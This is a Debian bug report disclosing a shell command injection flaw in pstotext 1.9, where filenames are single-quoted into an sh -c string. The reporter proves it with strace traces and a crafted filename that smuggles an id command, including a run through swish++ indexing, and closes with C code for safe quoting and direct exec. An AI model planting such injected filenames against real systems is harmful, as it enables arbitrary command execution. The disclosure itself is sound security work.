Package: pstotext
Version: 1.9-1sarge1
Severity: grave
Justification: user security hole
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "a'b.ps"
sh: -c: line 1: unexpected EOF while looking for matching `''
sh: -c: line 2: syntax error: unexpected end of file
[EMAIL PROTECTED]:/tmp/deleteme$ mv "a'b.ps" ab.ps
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "ab.ps"
ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
[EMAIL PROTECTED]:/tmp/deleteme$ strace -s 256 -e trace=process -ff pstotext
"a'b.ps"
execve("/usr/bin/pstotext", ["pstotext", "a\'b.ps"], [/* 35 vars */]) = 0
vfork(Process 25977 attached
) = 25977
[pid 25977] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY
-dFIXEDMEDIA -dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER
/tmp/ps2tvQBxTF -- \'a\'b.ps\'"], [/* 35 vars */]) = 0
sh: -c: line 1: unexpected EOF while looking for matching `''
sh: -c: line 2: syntax error: unexpected end of file
[pid 25977] exit_group(258) = ?
Process 25977 detached
--- SIGCHLD (Child exited) @ 0 (0) ---
waitpid(25977, [{WIFEXITED(s) && WEXITSTATUS(s) == 2}], 0) = 25977
exit_group(3) = ?
You can see that I correctly quoted the parameter in the invoking shell, and
pstotext passes the parameter to the nested sh as 'a'b.ps' which obviously gets
it confused.
This could be a security issue, if you can run pstotext with an
arbitrary filename (e.g. via swish++ running on some untrusted source).
e.g.:
[EMAIL PROTECTED]:/tmp/data$ strace -s 256 -e trace=process -ff "pstotext"
"hi.txt'; id>/tmp/abc.key; echo 'silly"
execve("/usr/bin/pstotext", ["pstotext", "hi.txt\'; id>/tmp/abc.key; echo
\'silly"], [/* 19 vars */]) = 0
arch_prctl(ARCH_SET_FS, 0x2aaaaaf7e6d0) = 0
clone(Process 9983 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD,
child_tidptr=0x2aaaaaf7e760) = 9983
[pid 9983] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY -dFIXEDMEDIA
-dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER /tmp/ps2tIqkOjd --
\'hi.txt\'; id>/tmp/abc.key; echo \'silly\'"], [/* 19 vars */]) = 0
[pid 9983] arch_prctl(ARCH_SET_FS, 0x2aaaab0576d0) = 0
[pid 9983] clone(Process 9984 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD,
child_tidptr=0x2aaaab057760) = 9984
[pid 9983] wait4(-1, Process 9983 suspended
<unfinished ...>
[pid 9984] execve("/usr/bin/gs", ["gs", "-r72", "-dNODISPLAY", "-dFIXEDMEDIA",
"-dDELAYBIND", "-dWRITESYSTEMDICT", "-q", "-dNOPAUSE", "-dSAFER",
"/tmp/ps2tIqkOjd", "--", "hi.txt"], [/* 18 vars */]) = 0
[pid 9984] arch_prctl(ARCH_SET_FS, 0x2aaaace67b30) = 0
ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
[pid 9984] exit_group(0) = ?
Process 9983 resumed
Process 9984 detached
[pid 9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0,
NULL) = 9984
[pid 9983] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 9983] wait4(-1, 0x7fffffb1ce14, WNOHANG, NULL) = -1 ECHILD (No child
processes)
[pid 9983] clone(Process 9985 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD,
child_tidptr=0x2aaaab057760) = 9985
[pid 9983] wait4(-1, Process 9983 suspended
<unfinished ...>
[pid 9985] execve("/usr/bin/id", ["id"], [/* 18 vars */]) = 0
[pid 9985] arch_prctl(ARCH_SET_FS, 0x2aaaaadf96d0) = 0
[pid 9985] exit_group(0) = ?
Process 9983 resumed
Process 9985 detached
[pid 9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0,
NULL) = 9985
[pid 9983] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 9983] wait4(-1, 0x7fffffb1ce34, WNOHANG, NULL) = -1 ECHILD (No child
processes)
[pid 9983] exit_group(0) = ?
Process 9983 detached
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(9983, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9983
exit_group(0) = ?
You can clearly see that I tricked pstotext into running id and outputting the
result into a temp file.
If I do the following:
[EMAIL PROTECTED]:/tmp/data$ touch "hi.txt'; id>abc.key; echo 'silly.ps"
[EMAIL PROTECTED]:/tmp/data$ rm abc.key
[EMAIL PROTECTED]:/tmp/data$ ls -l
total 0
-rw-r--r-- 1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps
I can trick swish++ into running an arbitrary command by passing
the filename through pstotext:
[EMAIL PROTECTED]:/tmp/data$ 'index++' -v4 '--config-file'
'/usr/share/sitebuilder/core/indexing.conf' '--index-file' /tmp/abcd /tmp/data
/tmp/data:
hi.txt'; id>abc.key; echo 'silly.psESP Ghostscript 7.07.1: Unrecoverable
error, exit code 1
(skipped: can not open)
index++: done:
00:01 (min:sec) elapsed time
1 files, 0 indexed
0 words, 0 indexed, 0 unique
[EMAIL PROTECTED]:/tmp/data$ ls -l
total 4
-rw-r--r-- 1 ivt ivt 162 2006-03-15 16:51 abc.key
-rw-r--r-- 1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps
[EMAIL PROTECTED]:/tmp/data$ cat abc.key
uid=1000(ivt) gid=1000(ivt)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(lpadmin),105(scanner),106(admin),1000(ivt)
As you can see, pstotext was tricked into running the id command and
the result appeared in abc.key.
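For reference, this is what a fix looks like. It is an added example, not pstotext's own code; only the gs option list is taken from the trace above, the function names are mine. sh_quote() quotes a filename correctly if the command must still go through sh -c; gs_argv()/run_gs() show the better fix, which is to exec gs directly with an argv array so no shell ever parses the filename:

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Correct POSIX single-quoting for an sh -c string: the trace's form just
 * surrounds the name with two ' so an embedded ' ends the quote; here each
 * embedded ' becomes '\'' instead. Returns length written or -1 if out is
 * too small. */
int sh_quote(const char *in, char *out, size_t outsz) {
    size_t n = 0;
    if (outsz < 3) return -1;
    out[n++] = '\'';
    for (const char *p = in; *p; p++) {
        int esc = (*p == '\'');
        size_t len = esc ? 4 : 1;
        if (n + len + 2 > outsz) return -1;   /* keep room for ' and NUL */
        if (esc) memcpy(out + n, "'\\''", 4); else out[n] = *p;
        n += len;
    }
    out[n++] = '\'';
    out[n] = '\0';
    return (int)n;
}

/* Stronger fix: build the argv that the trace shows gs finally receiving and
 * exec it directly; no shell parses the name. Returns count, argv[count]=NULL. */
int gs_argv(const char *tmpfile, const char *psfile,
            const char **argv, size_t maxargs) {
    const char *fixed[] = {"gs", "-r72", "-dNODISPLAY", "-dFIXEDMEDIA",
        "-dDELAYBIND", "-dWRITESYSTEMDICT", "-q", "-dNOPAUSE", "-dSAFER"};
    size_t i, nfixed = sizeof fixed / sizeof fixed[0];
    if (maxargs < nfixed + 4) return -1;
    for (i = 0; i < nfixed; i++) argv[i] = fixed[i];
    argv[i++] = tmpfile;
    argv[i++] = "--";
    argv[i++] = psfile;
    argv[i] = NULL;
    return (int)i;
}

/* fork/execvp in place of system()/popen(); returns gs's exit status or -1. */
int run_gs(const char *tmpfile, const char *psfile) {
    const char *argv[16];
    int status; pid_t pid;
    if (gs_argv(tmpfile, psfile, argv, 16) < 0) return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) { execvp(argv[0], (char *const *)argv); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```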
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (50, 'unstable')
Architecture: powerpc (ppc)
Kernel: Linux 2.6.8-pegasos
Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8)
Versions of packages pstotext depends on:
ii gs 8.01-5 Transitional package
ii gs-esp [gs] 7.07.1-9 The Ghostscript PostScript interpr
ii gs-gpl [gs] 8.01-5 The GPL Ghostscript PostScript int
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
-- no debconf information